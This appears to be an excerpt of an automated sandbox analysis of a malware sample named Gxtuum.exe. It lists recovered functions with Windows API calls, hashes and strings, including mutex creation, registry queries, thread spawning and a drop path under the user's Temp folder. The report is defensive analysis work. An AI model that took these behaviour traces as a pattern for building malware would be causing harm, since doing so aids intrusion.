                                                                • Opcode ID: 3bd39c0e4d6028ef6276121483db83c23e5888beba85ebc48b4af371c2741027
                                                                • Instruction ID: e32fe690e370cc555eb649cf8d4d71c2e879b554a2a1d7c2794849c83b0efb80
                                                                • Opcode Fuzzy Hash: 3bd39c0e4d6028ef6276121483db83c23e5888beba85ebc48b4af371c2741027
                                                                • Instruction Fuzzy Hash: B4411B71D043489FCB14EBA4D842BAFBBF8AF15300F04456DF5C667682EBB1A954C7A2
                                                                APIs
                                                                • _free.LIBCMT ref: 0012764E
                                                                • _free.LIBCMT ref: 00127677
                                                                • SetEndOfFile.KERNEL32(00000000,00123DDD,00000000,00124074,?,?,?,?,?,?,?,00123DDD,00124074,00000000), ref: 001276A9
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00123DDD,00124074,00000000,?,?,?,?,00000000), ref: 001276C5
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFileLast
                                                                • String ID:
                                                                • API String ID: 1547350101-0
                                                                • Opcode ID: 4388c322e436392a6eee88aa10940de72518c2eb8fa8ed170e25b94257d4bc0c
                                                                • Instruction ID: cc91060b48bd517ffa1f3f39da9b4a0dc287580d4606065f092639bd75e8f755
                                                                • Opcode Fuzzy Hash: 4388c322e436392a6eee88aa10940de72518c2eb8fa8ed170e25b94257d4bc0c
                                                                • Instruction Fuzzy Hash: 2F41EB72904A11ABEB196BBCEC46BDF7B75EF64360F150524F924E72D1DB30C8A08761
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aa2869baae827bbf2c0cbb87f441bb52e2068861ddc2c2efb43795955b89bc1f
                                                                • Instruction ID: b53bc83b5615dc4c73a9f20fbb01cf9fc5d2f354a7238341a6ce718b0dc673bf
                                                                • Opcode Fuzzy Hash: aa2869baae827bbf2c0cbb87f441bb52e2068861ddc2c2efb43795955b89bc1f
                                                                • Instruction Fuzzy Hash: 0B41C871A00755AFE724AF39CC41B9ABBE9EB98710F10892EF151DB2C1D7B1A9418790
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                • String ID:
                                                                • API String ID: 3264154886-0
                                                                • Opcode ID: 3a56161af42544b5c251a570496f55a5d441fa074f635a274809288984a2a572
                                                                • Instruction ID: fa1c9ae8dc4ef389e07ba0a4715b50c144d7b6d32d5a31cf407337ac83f1f98a
                                                                • Opcode Fuzzy Hash: 3a56161af42544b5c251a570496f55a5d441fa074f635a274809288984a2a572
                                                                • Instruction Fuzzy Hash: 7541CCB1A016159FCB15DB35C844B5ABBE8FF29310F004539E85AD7791EB71EA00CBC1
                                                                APIs
                                                                  • Part of subcall function 0010ED48: _free.LIBCMT ref: 0010ED56
                                                                  • Part of subcall function 0011E84F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0011C9D2,?,00000000,00000000), ref: 0011E8FB
                                                                • GetLastError.KERNEL32 ref: 0011F40B
                                                                • __dosmaperr.LIBCMT ref: 0011F412
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0011F451
                                                                • __dosmaperr.LIBCMT ref: 0011F458
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                • String ID:
                                                                • API String ID: 167067550-0
                                                                • Opcode ID: 8d68cac06b68c37e2d1b58b6802c5751203101cde779d01926792055c2200ba1
                                                                • Instruction ID: 2519a72800777708db05bd45e726568234723f72255af1eaecbabe9360fffb61
                                                                • Opcode Fuzzy Hash: 8d68cac06b68c37e2d1b58b6802c5751203101cde779d01926792055c2200ba1
                                                                • Instruction Fuzzy Hash: E721B071600219BF9B28AF668C809EBB7A8EF10364714853DF96997550DB31ECC1C760
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 001171C5
                                                                • _free.LIBCMT ref: 00117222
                                                                • _free.LIBCMT ref: 00117258
                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 00117263
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: 74ef48cd130f7ebab0b2fd09f384525e8e8303748d863df6e2d38fc8b956bdb8
                                                                • Instruction ID: 6cedb3d341b795c08f1ba0de6337a1556594f02c89d8c4516513307c4e2bb3ba
                                                                • Opcode Fuzzy Hash: 74ef48cd130f7ebab0b2fd09f384525e8e8303748d863df6e2d38fc8b956bdb8
                                                                • Instruction Fuzzy Hash: 2811A33220C2017BDB5D26B4AC81EEB297A9BE37747250735F524966F1DF66CCC28111
                                                                APIs
                                                                  • Part of subcall function 001083B9: GetModuleHandleExW.KERNEL32(00000002,00000000,?,?,?,0010840B,00000014,?,0010844C,00000014,?,000E2D32,00000000,00000014), ref: 001083C5
                                                                • __Mtx_unlock.LIBCPMT ref: 0010849E
                                                                • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,07E9847F,?,?,?,00128C80,000000FF), ref: 001084C6
                                                                • __Mtx_unlock.LIBCPMT ref: 00108501
                                                                • __Cnd_broadcast.LIBCPMT ref: 00108512
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                                                                • String ID:
                                                                • API String ID: 420990631-0
                                                                • Opcode ID: 20af30d7fc71244f302fc4519c4a46978b32a6c03fcfbd8f4f8986cf6a4a4e9d
                                                                • Instruction ID: c2bb85020cefce62641b22f8cebe3d81004edb007d4a1bb1f73f5a8b5f47f36e
                                                                • Opcode Fuzzy Hash: 20af30d7fc71244f302fc4519c4a46978b32a6c03fcfbd8f4f8986cf6a4a4e9d
                                                                • Instruction Fuzzy Hash: B911E976508600ABCA117B65EC12B5F7BA8FB51B20F00481AF9C5E76E3DFB5D840C6A0
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,00125D87,?,?,?,00000020,00000001), ref: 0011A2A5
                                                                • GetLastError.KERNEL32(?,00125D87,?,?,?,00000020,00000001), ref: 0011A2AF
                                                                • __dosmaperr.LIBCMT ref: 0011A2B6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: 885961711c0ded4a78935e1c18a568344250139ef94ea04fe8ce577d5a9e2330
                                                                • Instruction ID: ac81fe219bc3305816dd828c466c8ad27c13f306ee26b6485776db3299325709
                                                                • Opcode Fuzzy Hash: 885961711c0ded4a78935e1c18a568344250139ef94ea04fe8ce577d5a9e2330
                                                                • Instruction Fuzzy Hash: D1F06D32201115BBCB282BA6DC089CAFF69FF457A03458120F619D7420DB32E8D0D7D1
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,00125D12,?,?,?,?,00000020,00000001), ref: 0011A30E
                                                                • GetLastError.KERNEL32(?,00125D12,?,?,?,?,00000020,00000001), ref: 0011A318
                                                                • __dosmaperr.LIBCMT ref: 0011A31F
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: 1b8f57ee2494ed271acb999287088241758babf67f1355bb912033bc68c21171
                                                                • Instruction ID: 35c6b7208746c8cf27528781a3b49847b3170406726f086c83d59a812099841b
                                                                • Opcode Fuzzy Hash: 1b8f57ee2494ed271acb999287088241758babf67f1355bb912033bc68c21171
                                                                • Instruction Fuzzy Hash: 87F01D32601115BBCB295FA6DC08ADAFF69FF447A03598531F629D7420DB31E890DBD1
                                                                APIs
                                                                  • Part of subcall function 000EC730: Sleep.KERNELBASE(00000096), ref: 000EC6D6
                                                                  • Part of subcall function 000EC730: CreateMutexA.KERNELBASE(00000000,00000000,00147494), ref: 000EC6F4
                                                                  • Part of subcall function 000EC730: GetLastError.KERNEL32 ref: 000EC6FC
                                                                  • Part of subcall function 000EC730: GetLastError.KERNEL32 ref: 000EC70D
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(?,00000000), ref: 000E67BD
                                                                  • Part of subcall function 000E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 000E6894
                                                                • CreateThread.KERNEL32(00000000,00000000,00100F90,00000000,00000000,00000000), ref: 00101166
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00021020,00000000,00000000,00000000), ref: 00101177
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000210B0,00000000,00000000,00000000), ref: 00101188
                                                                • Sleep.KERNEL32(00007530), ref: 00101195
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Create$Thread$ErrorLastSleep$InfoMutexOpenQuery
                                                                • String ID:
                                                                • API String ID: 1072900782-0
                                                                • Opcode ID: 5c8b82c83f91aba404bc22da6582f29a9be4615ab6ee4521390e95646fc95cc5
                                                                • Instruction ID: 2c0d961a3690f5c2fd73a51e9dd3294d9602dec9eede23f2dfedc44161cc19ed
                                                                • Opcode Fuzzy Hash: 5c8b82c83f91aba404bc22da6582f29a9be4615ab6ee4521390e95646fc95cc5
                                                                • Instruction Fuzzy Hash: A0F0E531BD835876F13437A51C07FEA29045B08F91F340112B7A97E5C65EC5358066AF
                                                                APIs
                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000), ref: 00127901
                                                                • GetLastError.KERNEL32(?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?,00000000,?,00118482,?), ref: 0012790D
                                                                  • Part of subcall function 001278D3: CloseHandle.KERNEL32(FFFFFFFE,0012791D,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?,00000000), ref: 001278E3
                                                                • ___initconout.LIBCMT ref: 0012791D
                                                                  • Part of subcall function 00127895: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001278C4,001243BF,00000000,?,00117F36,?,?,00000000,?), ref: 001278A8
                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?), ref: 00127932
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                • String ID:
                                                                • API String ID: 2744216297-0
                                                                • Opcode ID: f0ff351726600f56bf03f9c48e12c9df535d54eabd3648a5c6ad2d8e2aff0c3b
                                                                • Instruction ID: a5fab39a772c374668663e7a4972fa37f32441ab9ad3699f56f8c97b5a8a5db8
                                                                • Opcode Fuzzy Hash: f0ff351726600f56bf03f9c48e12c9df535d54eabd3648a5c6ad2d8e2aff0c3b
                                                                • Instruction Fuzzy Hash: 39F0AC3A504165BBCF221F95EC08A9B3F66EB1A3A5B144014FE1DD5570D73298A0DB91
                                                                APIs
                                                                • SleepConditionVariableCS.KERNEL32(?,00109EF7,00000064,?,?,?,000E2E1C,0014CDC4), ref: 00109F7D
                                                                • LeaveCriticalSection.KERNEL32(00148FA8,000E2E1C,?,00109EF7,00000064,?,?,?,000E2E1C,0014CDC4), ref: 00109F87
                                                                • WaitForSingleObjectEx.KERNEL32(000E2E1C,00000000,?,00109EF7,00000064,?,?,?,000E2E1C,0014CDC4), ref: 00109F98
                                                                • EnterCriticalSection.KERNEL32(00148FA8,?,00109EF7,00000064,?,?,?,000E2E1C,0014CDC4), ref: 00109F9F
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                • String ID:
                                                                • API String ID: 3269011525-0
                                                                • Opcode ID: 5eeb76bb1aaf168e6b25980f01496b07792166d1f5ffa4e0deb9d10beeb40fff
                                                                • Instruction ID: 7fc890cc1a2e8175487242a3c7a38a916c6e1a7ccb1699aa892ba709e2b7949e
                                                                • Opcode Fuzzy Hash: 5eeb76bb1aaf168e6b25980f01496b07792166d1f5ffa4e0deb9d10beeb40fff
                                                                • Instruction Fuzzy Hash: 2AE04F36A45125BBCB012F50EC09ACEBF2AFF59B72B104111FA09A69B0CFB119959BD4
                                                                APIs
                                                                • _free.LIBCMT ref: 00114B02
                                                                  • Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
                                                                  • Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE
                                                                • _free.LIBCMT ref: 00114B15
                                                                • _free.LIBCMT ref: 00114B26
                                                                • _free.LIBCMT ref: 00114B37
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 2d4fd8c805d5b0f39cbd8bbee5fe3c61806142e86c0ef76162163cb0957bedf2
                                                                • Instruction ID: 73a21dbac150b872c4e8a393ee24ea20b7118106b4e4c68bc573bdbb81c4db73
                                                                • Opcode Fuzzy Hash: 2d4fd8c805d5b0f39cbd8bbee5fe3c61806142e86c0ef76162163cb0957bedf2
                                                                • Instruction Fuzzy Hash: 8DE0E6BD8112209ECB556F15FC418C7BE62F79A754342801EF41C22A31DB3945D29F95
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 001138ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorHandling__start
                                                                • String ID: pow
                                                                • API String ID: 3213639722-2276729525
                                                                • Opcode ID: 72830601d4d190bcd7499e48e000b5b7b398fe225b2d9e754e905b4aa40778ce
                                                                • Instruction ID: fa417983987e14404107ffa1355b92535a7fd53028fb9cf4e7c0fa69bab56c22
                                                                • Opcode Fuzzy Hash: 72830601d4d190bcd7499e48e000b5b7b398fe225b2d9e754e905b4aa40778ce
                                                                • Instruction Fuzzy Hash: A751CD61A0820596CB1D7794C9113FE6BE5EB60B58F208E79F8E1422ACFF348DD4DB42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                • API String ID: 0-1719652438
                                                                • Opcode ID: 91ca972826d96004eaf8fcf35e1fe8b78d1c74136d1229b09845503791939992
                                                                • Instruction ID: 2cee17ab87825b8060a7fe6356f4d1e9660e4418fdfc30c2bac0dfd742a692ca
                                                                • Opcode Fuzzy Hash: 91ca972826d96004eaf8fcf35e1fe8b78d1c74136d1229b09845503791939992
                                                                • Instruction Fuzzy Hash: 5E41A071E00215AFDB299F9ADC819DFBBB8EF99710B11007AF508D7251E7718AC1CB51
                                                                APIs
                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0010D4E1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID: MOC$RCC
                                                                • API String ID: 2118026453-2084237596
                                                                • Opcode ID: 4b28fcaf82ee544a3e9bf7ed0bf9cfe9389f840d056e9eb56c40efaf918eedcc
                                                                • Instruction ID: 1886c81d0d480946ecc023a2ab4ac0665e698a96b821414bee634b58825ecf7b
                                                                • Opcode Fuzzy Hash: 4b28fcaf82ee544a3e9bf7ed0bf9cfe9389f840d056e9eb56c40efaf918eedcc
                                                                • Instruction Fuzzy Hash: 3A419C71900209AFCF16DF98DC81AEEBBB5FF08304F188059F945A7291D3B59A51CF51
                                                                APIs
                                                                • __alloca_probe_16.LIBCMT ref: 00108292
                                                                • RaiseException.KERNEL32(?,?,?,?), ref: 001082B7
                                                                  • Part of subcall function 0010B446: RaiseException.KERNEL32(E06D7363,00000001,00000003,00143A84,?,?,?,00143A84), ref: 0010B4A6
                                                                  • Part of subcall function 0010E364: IsProcessorFeaturePresent.KERNEL32(00000017,0011727C,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 0010E380
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                • String ID: csm
                                                                • API String ID: 1924019822-1018135373
                                                                • Opcode ID: e188388184496159f01096f36a154a95e76e8ec41634093d4a173d71c5ad5197
                                                                • Instruction ID: 9018f12bb283a3dfd26e9a63ac3b6ebbee8b3e59bb79ea6a2c714143c146c108
                                                                • Opcode Fuzzy Hash: e188388184496159f01096f36a154a95e76e8ec41634093d4a173d71c5ad5197
                                                                • Instruction Fuzzy Hash: 0421A932D0061CABCF34DFE5C885AAEB7B9BF55710F554409E8C5AB294CBB0AD45CB81
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 000E44EB
                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000E453A
                                                                  • Part of subcall function 00108D3E: _Yarn.LIBCPMT ref: 00108D5D
                                                                  • Part of subcall function 00108D3E: _Yarn.LIBCPMT ref: 00108D81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                • String ID: bad locale name
                                                                • API String ID: 1908188788-1405518554
                                                                • Opcode ID: 4edd91d1f9ec5f8909c0255504446de2d0d81795ed651e2563330c4c5d71fd1f
                                                                • Instruction ID: 08ed8cd8c2d6ee9475fad4bb9ff19b353030f07b0f6207117633d18b076d5d9c
                                                                • Opcode Fuzzy Hash: 4edd91d1f9ec5f8909c0255504446de2d0d81795ed651e2563330c4c5d71fd1f
